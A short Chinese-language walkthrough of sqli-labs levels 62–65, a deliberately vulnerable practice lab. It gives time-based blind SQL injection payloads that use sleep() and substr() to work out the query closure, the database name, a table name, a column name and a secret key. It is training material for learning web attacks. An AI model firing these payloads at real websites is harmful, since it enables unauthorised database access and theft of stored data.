sqli-labs-master/Less-62~Less-65
Less-62
这一关开始就是使用时间盲注了,并且它规定查130次。
首先,我们判断他的闭合方式。
?id=1')and sleep(3)--%20页面延时了,说明闭合成功了。
下面我们判断它的数据库名的长度
?id=1')and if(length(database())>10,sleep(1),1)--%20当长度大于9时,页面延时,大于10时页面不延时,说明数据库的长度为10
?id=1')and if(substr(database(),1,1)='c',sleep(1),1)--%20截取数据库从第一位开始截取一位,如果是c,则sleep一秒,依次类推,直到判断出数据库的名字为challenges为止。
接下来就是判断表名了。
?id=1')and if(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='m',sleep(3),1)--%20
以此类推,直到判断出表名为止。
接下来爆字段
?id=1')and if(substr((select column_name from information_schema.columns where table_schema='challenges' and table_name='mss5jm6plq' limit 2,1),1,1)='s',sleep(3),1)--%20
下面以此类推,直到判断出需要的字段为止。
下面面爆字段信息
?id=1')and if(substr((select secret_FT6J from mss5jm6plq),1,1)='k',sleep(3),1)--%20
然后,将我们查出来的密钥填到下面。
Less-63
这一关和以前一样,还是先判断闭合
?id=1' and sleep(3)--%20
接下来参考上面即可。
Less-64
?id=1))and sleep(3)--%20
只是闭合方式不同。其他参考上一关即可。
Less-65
?id=1")and sleep(3)--%20